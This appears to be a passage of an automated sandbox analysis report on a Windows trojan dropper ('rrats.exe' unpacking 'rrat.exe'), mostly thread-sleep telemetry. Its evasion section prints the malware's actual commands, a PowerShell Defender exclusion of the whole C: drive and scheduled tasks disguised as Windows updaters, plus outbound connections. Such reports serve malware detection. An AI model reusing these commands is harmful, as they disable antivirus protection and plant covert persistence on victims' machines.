                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 596687
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 596578
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 596468
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 596329
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 596203
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 596086
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 595984
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 595874
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 595764
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 595330
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 595203
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 595057
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594952
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594841
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594733
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594613
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594484
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594348
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594218
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594109
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 594000
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 593890
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 593781
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\explore.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe; Window / User API: threadDelayed 411
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5922
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3754
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Window / User API: threadDelayed 3437
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Window / User API: threadDelayed 6333
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5852
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3929
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe; Evasive API call chain: GetLocalTime,DecisionNodes (graph_4-19226)
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe TID: 3628; Thread sleep count: 411 > 30
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe TID: 3628; Thread sleep count: 85 > 30
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe TID: 1488; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5628; Thread sleep count: 5922 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5252; Thread sleep count: 3754 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180; Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -30437127721620741s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599775s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599671s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599453s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599343s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599234s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599121s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -599015s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -598906s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -598797s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -598687s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -598578s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -598465s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -598282s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597965s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597858s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597747s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597638s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597531s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597421s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597284s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597156s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -597010s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -596905s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -596796s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -596687s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -596578s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -596468s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -596329s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -596203s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -596086s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -595984s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -595874s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -595764s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -595330s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -595203s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -595057s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594952s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594841s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594733s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594613s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594484s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594348s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594218s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594109s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -594000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -593890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756; Thread sleep time: -593781s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7468; Thread sleep count: 278 > 30
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7460; Thread sleep count: 101 > 30
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7444; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\explore.exe TID: 7680; Thread sleep count: 300 > 30
                        Source: C:\Users\user\AppData\Local\explore.exe TID: 7664; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812; Thread sleep count: 5852 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812; Thread sleep count: 3929 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992; Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                        Source: C:\Users\user\Desktop\rrats.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\explore.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00CAA69B
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00CBC220
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CCB348 FindFirstFileExA, 0_2_00CCB348
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E82AF9 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 4_2_00E82AF9
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E91260 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 4_2_00E91260
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E9FCC8 FindFirstFileExA, 4_2_00E9FCC8
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBE6A3 VirtualQuery,GetSystemInfo, 0_2_00CBE6A3
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599890
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599775
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599671
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599562
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599453
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599343
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599234
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599121
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 599015
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 598906
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 598797
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 598687
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 598578
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 598465
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 598282
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597965
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597858
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597747
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597638
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597531
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597421
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597284
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597156
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 597010
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 596905
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 596796
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 596687
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 596578
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 596468
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 596329
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 596203
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 596086
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 595984
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 595874
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 595764
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 595330
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 595203
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 595057
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594952
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594841
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594733
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594613
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594484
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594348
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594218
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594109
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 594000
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 593890
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 593781
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\explore.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: rrat.exe.4.dr | Binary or memory string: vmware
                        Source: Explorer.exe, 00000010.00000002.4490094603.0000000000E58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\rrats.exe | API call chain: ExitProcess graph end node graph_0-25133
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | API call chain: ExitProcess graph end node graph_4-19997
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CBF838
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CC7DEE mov eax, dword ptr fs:[00000030h] 0_2_00CC7DEE
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E9C733 mov eax, dword ptr fs:[00000030h] 4_2_00E9C733
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CCC030 GetProcessHeap, 0_2_00CCC030
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CBF838
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBF9D5 SetUnhandledExceptionFilter, 0_2_00CBF9D5
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00CBFBCA
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CC8EBD
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E9495A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00E9495A
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E94561 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00E94561
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E9D792 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00E9D792
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E94705 SetUnhandledExceptionFilter, 4_2_00E94705
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Network Connect: 104.20.4.235 443
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Network Connect: 172.67.19.24 443
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Network Connect: 194.67.204.7 88
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Users\user\Desktop\rrats.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe a.exe -p1234
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe"
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat""
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"'
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Explorer.exe "C:\Users\user\AppData\Roaming\Explorer.exe"
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBF654 cpuid 0_2_00CBF654
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00CBAF0F
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: GetLocaleInfoW,GetNumberFormatW, 4_2_00E9006D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
